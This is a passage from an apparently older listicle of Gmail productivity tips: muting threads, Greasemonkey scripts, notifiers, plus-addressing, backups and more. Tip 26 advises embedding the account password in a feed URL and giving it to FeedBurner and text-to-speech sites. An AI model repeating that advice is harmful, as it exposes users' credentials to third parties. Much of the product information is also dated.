To upload old email like my friend did, set up a Gmail IMAP account in your desktop email client. In the client, establish folders that correspond to your Gmail labels, and drag and drop your non-Gmail into the folders. If you're using Outlook with .PST format or Outlook Express, you will have to convert or export the emails to mBox data file format before the messages will translate. The process may take some time, and your client may hang. Also, the original dates and times attached to the messages will appear in Gmail as the dates and times that the messages were imported into Gmail. But it's worth the trouble to utilize your tricked-out Gmail, right?
Click here for a tutorial from My Digital Life.


11. Mute a conversation

Ever found yourself subscribed to a mailing list and the current conversation has nothing to do with you? If you don’t want to unsubscribe, you can easily stop the friendly spam with the Gmail mute function. Select a message in the thread and hit the m key to auto-archive all incoming messages in the conversation. The thread will stay muted until you unmute it; it will also un-mute itself if your address appears in the To or CC box.
12. Get it all in one place
Gmail’s built-in Mail Fetcher allows you to receive and send from up to five different accounts via POP3. Unlike a simple forwarding feature, Mail Fetcher allows synchronizing of your Gmail actions with the home server. Go to your Gmail Settings ? Accounts, then Add another mail account. One caveat of sending from non-Gmail accounts: the recipients may see FROM you@Gmail.com on behalf of you@otherdomain.com, especially if the recipients are using a client like Outlook.


13. Get it all in one place
With the Google Toolbar and Gmail combined, power user Steve Rubel has made his Gmail account into a massive archive of his interests. Steal his trick by adding the Google toolbar to your browser. When you happen across text or images you want to save, highlight them and click the send to Gmail link. Rubel has also tons of other great hints.
14. Secure your email
Work that requires maximum security—or run-of-the-mill paranoia—is made easier with this script with Greasemonkey + Firefox. It'll force a secure connection when accessing Gmail. To make sure you're as secure as you can be, check out the internet security category at the web directory.


15. Don't forget that attachment

If your sent folder is full of "Oops, here's the attachment" messages, this handy reminder Greasemonkey script will scan your messages--including replies and forwards--for references to attachments. (The release notes say that it searches for "attached," "attachment" or certain unknown variations.) If you mention an attachment and forget to add it, a prompt will pop up.
16. Gmail Notifier for Windows / Google Notifier for Mac
Rather than keeping a browser window open and hitting CTRL-R like you've got OCD, install a widget like Gmail Notifier for Windows or Google Notifier for Macs. It'll check your email (and Google Calendar, if you're a Mac user) as compulsively as you do. And as with almost everything else under the sun, there's a Firefox extension that will serve the same function (it's not released by Google).




17. Google Desktop Plug-In for Google Notifier
Some users have reported compatibility issues between Google Toolbar, Google Apps and Google Desktop. Everyone's configuration is different, blah blah blah, so it's impossible to know, but Maxim Alexeyev created this Google Desktop Plug-In which purports to replace Google Notifier for Google Desktop and Google Toolbar users. The plug-in also offers multi-username functions and Google Apps support.
18. Check Gmail from the couch with Apple Remote
Mac users who actually use their Apple Remotes (show of hands—anyone? anyone?) can check out this Lifehacker tutorial that lets you check your Gmail from your couch with Firefox shortcuts. There’s gotta be someone out there who needs this…


19. Read your Google Reader RSS feeds in Gmail
Treat your Google Reader RSS feeds the same way you treat old friends with this Greasemonkey + Firefox script. Feeds invading your Gmail will offer more-efficient time-wasting than ever before. Note that Google Reader and Gmail seem to be moving closer together in functionality and interface and it's likely that they'll soon be officially integrated.


20. Include or exclude Chat from search results
Chat conversations are automatically filed like emails with a Chat label, so to exclude Chat when searching, use the string -label:Chat. Conversely, to search only Chat conversations, use the string +label:Chat. The –label: and +label: syntax will work to exclude or include any label in Gmail search results. Another Jim Barr tip.
21. Use Gmail like an external hard drive
Use up any vegetating space in your Gmail account with this Windows drive shell extension. Your Gmail space appears in My Computer/Windows Explorer as an external drive, and when you drag and drop a file to the drive, it sends an email to your Gmail account with the file as an attachment. Note that this is a fairly old program but seems to have been updated for the latest Gmail version. Mac users can try gDisk and Linux users can check out GmailFS.




22. Spam counter hider

You’re browsing through your (overstuffed) inbox. You have many labels, filters and tricks that ensure that your email gets to you efficiently. Even so, you look at the number of messages in the spam folder and a small voice inside you says, “There could be something in the spam folder that doesn’t belong there!” Forget it. There never is. This Greasemonkey + Firefox script hides the spam count number, so the thought doesn’t even cross your mind.
23. Hack Gmail’s CSS
“Stylish is to CSS what Greasemonkey is to JavaScript,” says the Firefox extension page for Stylish. Cascade those style sheets yourself, or grab them from userstyles.org. For more web design tips and tricks, check out these web design and development resources.
24. Launch one-key composing with Launchy (Windows) or Quicksilver (Mac)
Launchy is a free, open source keyword launcher that runs in your system tray and opens apps with designated keystrokes. Launchy’s still “a far cry from Quicksilver for Mac” according to Gina Trapani at Lifehacker, but Adam Pash of Lifehacker says,
“I can't recommend it highly enough.” There’s a quick tutorial on one-key Gmail composing with Launchy—opening a browser logged into Gmail with a compose window with a single keystroke—
here.


25. Better Gmail 2 with all-in-one Greasemonkey script
For a one-size-fits-all solution that combines several Greasemonkey scripts into one package, check out Better Gmail 2, which combines dozens of Greasemonkey scripts into one package. Allow HTML use in signatures, force a secure connection, convert labels into folders and make the spam folder invisible. There’s also a Better Gmail 2 extension for those using Firefox 3 beta. Cnet strongly recommends the extension in their review.
26. Create a podcast of your Gmail
Without an iPhone or Blackberry, the morning subway ride can get pretty boring. And you can’t navigate a smartphone while driving—or at least, you shouldn’t. Create an RSS feed from your Gmail account with this syntax:
https://username:password@gmail.google.com/gmail/feed/atom
Then sign for a
FeedBurner account to host and distribute it. Use a RSS to podcast site like AudioDizer.com or one of the many options at NextUp to create text-to-speech files. Voila! This hack is based on a tip from Mike Donaghy. For even more, check out these podcast resources.

27. Force mailto: to open with Gmail
The annoyance of prompts from Outlook or Apple Mail with every mailto: link you click can be ended. This Greasemonkey script forces mailto: scripts to open Gmail. (Note: it’s unclear whether this script is compliant with the newest version of Gmail.)
28. Emulate a mail client
For those who can’t decide between a full-fledged mail client and browser-based Gmail, SimpleMail straddles the divide with a three-paned mail view. Mac users should note Adam Pash at Lifehacker warns that he had trouble getting IMAP to work with Firefox 3 on the Mac, but he doesn’t mention testing it with Firefox 2.0.0.12.


29. Sort mail with the Trusted Trio
Gina Trapani at Lifehacker suggests sorting your Gmail according to the Trusted Trio system—Follow Up, Hold and Archive. To keep the Inbox clear, sort all messages into one of these three categories. Since Gmail has an archive function built-in, Trapani suggests merely creating two labels—Follow Up and Hold; if desired, add numbers to get the two folders to display in the order you’d like. Check out the full explanation of the Trusted Trio system.
30. Pre-label and sort your mail
Many email providers, including Gmail, allow you to append your address with +something—for example, you can give all of your OS/2 user group buddies your address as you+OS2@gmail.com. (Note that Gmail addresses are not case sensitive). The incoming emails that wax nostalgic about IBM’s late great OS will be pre-labeled, and you can establish filters to sort them. The +something system also allows you to stop spam before it starts. If inappropriate emails with a designated +something address, you can kill off the address. You’ll also have an inkling how the spam got started. Thanks to Jim Barr for this tip.
31. Force Firefox extensions to work with Firefox 3 beta
This Lifehacker tip is for extreme power users only, as it could open your system to serious security flaws and bleeding edge malfunctions. It’s only a few easy steps after the jump. Have fun! User fluxam reports a list of extensions that were functioning in 3 beta as of 02/13/2008.
32. Add address-specific signatures with HTML
If you use multiple Gmail accounts, the Gmail HTML Signatures extension for Firefox + Greasemonkey automates the signature process. Based on the address you’re sending from, this extension will automatically insert HTML-formatted signatures.


33. Backup your Gmail
If you’re using a desktop or smartphone mail client, you’ve already got some backups of your email. But what if you’re all web-based? What if Gmail servers were hit by a nuclear bomb? Stop the paranoia and check the Gmail backup tutorial here and the Google Apps backup tips here.

34. Command line Gmail access (Windows) and nightly backup

There’s a tutorial—not for n00bs—here.
35. Force Gmail Notifier (Windows) to use SSL
This wikihow tutorial involves hex editing. Advanced Mac users with Google Notifier, here’s a comment on the O’Reilly Mac DevCenter forums that should help. Edit at your own risk.